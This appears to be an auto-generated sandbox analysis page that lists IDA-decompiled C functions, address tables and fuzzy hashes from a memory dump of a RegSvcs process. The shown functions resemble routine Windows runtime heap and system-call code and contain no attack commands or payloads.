0x00fe2aa2
0x00fe2aa5
0x00fe2aa8
0x00fe2aab
0x01025cab
0x01025caf
0x01025cc5
0x01025cda
0x01025cdc
0x01025cdf
0x01025ce5
0x00000000
0x01025ceb
0x01025ced
0x01025cee
0x00000000
0x01025cee
0x01025cb1
0x01025cb4
0x01025cb9
0x01025cbb
0x00000000
0x01025cbd
0x01025cbd
0x00000000
0x01025cbd
0x01025cbb
0x00fe2ab1
0x00fe2ab1
0x00fe2ac4
0x00fe2ac6
0x00fe2ac6
0x00000000
0x00fe2ac6
0x00fe2aab
0x00000000
0x00fe2a00
0x00fe2a09
0x00fe2a0e
0x00fe2a21
0x00fe2a24
0x00fe2a35
0x00fe2a3a
0x00fe2a3d
0x00fe2a42
0x00fe2a59
0x00fe2a59
0x00fe2a5c
0x00fe2a5f
0x00fe2a5f
0x00fe29fa
0x00fe29f3
0x00fe2a64
0x00fe2a64
0x00fe2a6b
0x00fe2a6b
0x00fe2a6d
0x00fe2a72
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4aca5644039e069699237123bf391dfba928e4618d40950fc17e80ae1ffc30b
Instruction ID: b2d6b943a842169718c4f2cef4c91ed94aeef63d39fd66c314dcae36453b213b
Opcode Fuzzy Hash: a4aca5644039e069699237123bf391dfba928e4618d40950fc17e80ae1ffc30b
Instruction Fuzzy Hash: B6516B319002599FDF65DF5ACC80ADEBBB9BF48710F148065E804AB261E7398D52EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FE4BAD Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00FE4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x10ad360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E00FBCC50(_t86);
					L11:
					return E00FFB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x10a8504
				E00FD2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E00FFFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E00FFB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L00FD4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E00FBCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x10a8504
								E00FCFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E00FE4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x00fe4bad
0x00fe4bbf
0x00fe4bc2
0x00fe4bc6
0x00fe4bcd
0x00fe4bd9
0x010267fe
0x01026800
0x00fe4ccc
0x00fe4ccd
0x00fe4cb7
0x00fe4cc9
0x00fe4cc9
0x00fe4bdf
0x00fe4be5
0x00000000
0x00000000
0x00fe4beb
0x00fe4bef
0x00000000
0x00000000
0x00fe4bf5
0x00fe4bf9
0x00fe4c06
0x00fe4c0b
0x00fe4c17
0x00fe4c1c
0x00fe4c1f
0x00fe4c25
0x00fe4c33
0x00fe4c3d
0x00fe4c40
0x00fe4c43
0x00fe4c47
0x00fe4c4d
0x00fe4c53
0x00fe4c54
0x00fe4c55
0x00fe4c56
0x00fe4c5b
0x00fe4c5c
0x00fe4c63
0x00fe4c6b
0x00000000
0x00000000
0x01026776
0x01026784
0x01026784
0x0102679f
0x010267a7
0x010267af
0x010267ce
0x00000000
0x010267b1
0x010267b7
0x010267b8
0x010267c1
0x010267d3
0x010267d9
0x010267dd
0x00fe4c94
0x00fe4c94
0x00fe4c98
0x00fe4c9c
0x00fe4ca3
0x010267f4
0x010267f4
0x00fe4cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x00fe4cb5
0x00fe4c79
0x00fe4c7e
0x00fe4c89
0x00fe4c8b
0x00fe4c8f
0x00fe4c8f
0x00000000
0x00fe4c89
0x010267c3
0x00000000
0x010267c3
0x010267af
0x00fe4c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4b9c2e2f7e72637f4f2eb4b0dd0fbec4435a652d603085fdfee4c8f4e7d0c
Instruction ID: 9b4c60ae0b2fff2f2c542a5c406aadfda77c349c9c2828a8550339201a4aa963
Opcode Fuzzy Hash: 3ef4b9c2e2f7e72637f4f2eb4b0dd0fbec4435a652d603085fdfee4c8f4e7d0c
Instruction Fuzzy Hash: 9841D632A012689BCB21DF69CD41BEA77B4FF45710F1104A9E948AB341D739EE84DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FE4D3B Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00FE4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x10ad360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E00FFFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x10a7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E00FFB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L00FD4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E00FBCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E00FFB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E00FFF380(_t67 + 0xc, 0xf95138, 0x10) == 0) {
								 *0x10a60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E00FE4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E00FE4E70(0x10a86b0, 0xfe5690, 0, 0) != 0) {
					_t46 = E00FBCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x00fe4d3b
0x00fe4d4d
0x00fe4d53
0x00fe4d58
0x00fe4d65
0x00fe4d6c
0x00fe4d71
0x00fe4d77
0x00fe4d7f
0x00fe4d8c
0x00fe4d8e
0x00fe4dad
0x00fe4db0
0x00fe4db7
0x00fe4db8
0x00fe4db9
0x00fe4dba
0x00fe4dbb
0x00fe4dc1
0x00fe4dc8
0x00fe4dcc
0x00fe4dd5
0x00fe4dde
0x00fe4ddf
0x00fe4de0
0x00fe4de1
0x00fe4de6
0x00fe4de7
0x00fe4de9
0x00fe4df3
0x00000000
0x00000000
0x01026c7c
0x01026c8a
0x01026c8a
0x01026c9d
0x01026ca7
0x01026cac
0x01026cb2
0x01026cb9
0x00000000
0x01026cbf
0x01026cbf
0x00000000
0x01026cbf
0x01026cb9
0x00fe4dfb
0x01026ccf
0x01026cd3
0x00fe4e32
0x00fe4e39
0x01026ce0
0x01026cf2
0x01026cf2
0x01026ce0
0x00fe4e3f
0x00fe4e41
0x00fe4e51
0x00fe4e51
0x00fe4e03
0x00fe4e03
0x00fe4e09
0x00fe4e0f
0x00fe4e57
0x00000000
0x00000000
0x00fe4e1b
0x00fe4e30
0x00fe4e5b
0x00fe4e5b
0x00000000
0x00fe4e30
0x00fe4e11
0x00fe4e11
0x00fe4e16
0x00000000
0x00fe4e16
0x00fe4e01
0x00000000
0x00fe4e01
0x00fe4da5
0x01026c6b
0x00000000
0x00fe4dab
0x00fe4dab
0x00000000
0x00fe4dab

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cc06d63314b25e6b3100cefff6d2db6a78cb0d858e6b31a34067dfe824e3b44
Instruction ID: 3433a73f12f97af88e24675070ff898693d5a7e5b4d22843da9fb0ee2e98e283
Opcode Fuzzy Hash: 7cc06d63314b25e6b3100cefff6d2db6a78cb0d858e6b31a34067dfe824e3b44
Instruction Fuzzy Hash: 8B41F271A403589FEB32DF15CC81FABB7AAEB04710F1040AAE9459B281D779ED40EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FC8A0A Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00FC8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x10ad360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E00FFB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E00FCE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0xf91180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E00FE1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E00FF3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E00FC8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x00fc8a0a
0x00fc8a1c
0x00fc8a23
0x00fc8a2e
0x00fc8a30
0x00fc8a36
0x00fc8a3c
0x00fc8a3e
0x00fc8a4a
0x00fc8a52
0x00fc8a9c
0x00fc8aae
0x00fc8a58
0x00fc8a5e
0x00fc8a6a
0x00fc8a6f
0x00fc8a75
0x00fc8a7d
0x00fc8a85
0x00fc8a86
0x00fc8a89
0x00fc8a93
0x00fc8a99
0x00fc8a9b
0x00000000
0x00fc8aaf
0x00fc8abe
0x00fc8ac3
0x00fc8acb
0x00fc8ad7
0x00fc8ae0
0x00fc8af1
0x00000000
0x00fc8af1
0x00fc8acd
0x00fc8ad5
0x00fc8afb
0x00fc8afd
0x00fc8aff
0x00fc8b07
0x00fc8b22
0x00fc8b24
0x00fc8b2a
0x00fc8b2e
0x00fc8b3f
0x00fc8b78
0x00fc8b41
0x00fc8b52
0x00fc8b54
0x00fc8b5c
0x00fc8b74
0x00fc8b74
0x00fc8b5c
0x00fc8b3f
0x00fc8b5e
0x00fc8b61
0x00fc8b64
0x00fc8b64
0x00fc8b6c
0x00fc8b6c
0x00fc8b11
0x01019cd5
0x01019cd5
0x00fc8b17
0x00fc8b1a
0x00fc8b1a
0x00000000
0x00fc8ad5
0x00fc8a89

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40ce2ee1c1e9271e4ea3d9559c240c0b890e8addec266a59ffc31f9afb97ccbd
Instruction ID: 4e36af3ebd3f626e5906a700a2ba179b423797f901dbfe1627a301425346955e
Opcode Fuzzy Hash: 40ce2ee1c1e9271e4ea3d9559c240c0b890e8addec266a59ffc31f9afb97ccbd
Instruction Fuzzy Hash: 474180B1A0022D9BDB24CF15CD89FA9B3F4EB94350F1041EAE80997252EB749E81DF60

Uniqueness

Uniqueness Score: -1.00%

Function 0107AA16 Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0107AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0107ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0107AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0107AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0105CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L00FD77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E00FD7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0107131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0105CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x0107aa1f
0x0107aa21
0x0107aa23
0x0107aa2b
0x0107aa30
0x0107aa36
0x0107aa39
0x0107aa42
0x0107aa75
0x0107aa7a
0x0107aa7c
0x0107aa7c
0x0107aa88
0x0107aa8a
0x0107aa8f
0x0107ab02
0x0107ab04
0x0107aa99
0x0107aaa8
0x0107aaaf
0x0107aab3
0x0107aacc
0x0107aad1
0x0107aad6
0x0107aae0
0x0107aaf3
0x0107aaf9
0x0107aafe
0x0107aafe
0x0107aaf3
0x0107aad6
0x0107aab3
0x0107ab07
0x0107ab0a
0x0107ab11
0x0107ab23
0x0107ab13
0x0107ab1c
0x0107ab1c
0x0107ab2b
0x0107ab44
0x0107ab44
0x0107ab51
0x0107ab51
0x0107aa44
0x0107aa47
0x0107aa4c
0x00000000
0x00000000
0x0107aa5a
0x0107aa64
0x0107aa72
0x00000000
0x0107aa66
0x0107aa66
0x0107aa68
0x0107aa6a
0x00000000
0x0107aa6a

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: ba2ab18bddf550f8943d871498de830f48d0a1ae695d14b94a012f81474b4d82
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: FB310632F00245ABEB159B69CC45BBFFBBBEF84210F0D44A9E985A7292DB748D00C754

Uniqueness

Uniqueness Score: -1.00%

Function 0107FDE2 Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0107FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0107FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01080A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E00FD7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01071608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01082B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0107C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0107DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E00FD7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0107A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0107fde7
0x0107fde8
0x0107fdec
0x0107fdee
0x0107fdf5
0x0107fdf7
0x0107fdfc
0x0107fe19
0x0107fe22
0x0107fe26
0x0107fec6
0x0107fecd
0x0107fed5
0x0107fee7
0x0107fed7
0x0107fee0
0x0107fee0
0x0107feef
0x0107ff00
0x0107ff02
0x0107ff07
0x0107ff07
0x00000000
0x0107feef
0x0107fe33
0x0107fe55
0x0107fe59
0x0107fe5b
0x0107fe5e
0x0107fe69
0x0107fe6d
0x0107fe6d
0x0107fe69
0x0107fe35
0x0107fe41
0x0107fe41
0x0107fe79
0x0107fe8b
0x0107fe7b
0x0107fe84
0x0107fe84
0x0107fe93
0x00000000
0x0107fea8
0x0107feba
0x00000000
0x0107feba
0x0107fdfe
0x0107fe01
0x0107fe02
0x0107fe08
0x0107ff0c
0x0107ff14
0x0107ff14

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 30b5f98b96662cf2b06ce6217997a70e9d1d31f6c7887a52818348cea263514a
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 74312832B04642AFD3229B6CC845F6A7BE6EF85740F084498F9D58B342DE74DC41C768

Uniqueness

Uniqueness Score: -1.00%

Function 0107EA55 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0107EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E00FD2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0107E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E00FBF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E00FCFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0107AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0107BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E00FD7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0106FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E00FCFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0107A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0107ea55
0x0107ea66
0x0107ea68
0x0107ea6c
0x0107ea6f
0x0107ea72
0x0107ea75
0x0107ea7a
0x0107ea7a
0x0107ea7e
0x0107ea80
0x0107ea85
0x0107ea8b
0x0107eab5
0x0107eabc
0x0107eabf
0x0107eabf
0x0107eaca
0x0107eace
0x0107ead0
0x0107eae4
0x0107eaeb
0x0107eaf0
0x0107eaf5
0x0107eb09
0x0107eb0d
0x0107eb1d
0x0107eb2d
0x0107eb38
0x0107eb3d
0x0107eb41
0x0107eb4a
0x0107eb60
0x0107eb4c
0x0107eb52
0x0107eb59
0x0107eb59
0x0107eb68
0x0107eb71
0x0107eb71
0x0107ea8d
0x0107ea8f
0x0107ea92
0x0107ea97
0x0107ea97
0x0107ea9b
0x0107ea9c
0x0107ea9e
0x0107eaa6
0x0107eaa6
0x0107eb7e

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 607c04e53f40145122d56edfe6fd979e319c36bdd41160dd855e6e10a504bd80
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: B631C372A05705ABC719DF28CC81A6BB7EAFFC4310F04496DF59687741DA34E809CBA5

Uniqueness

Uniqueness Score: -1.00%

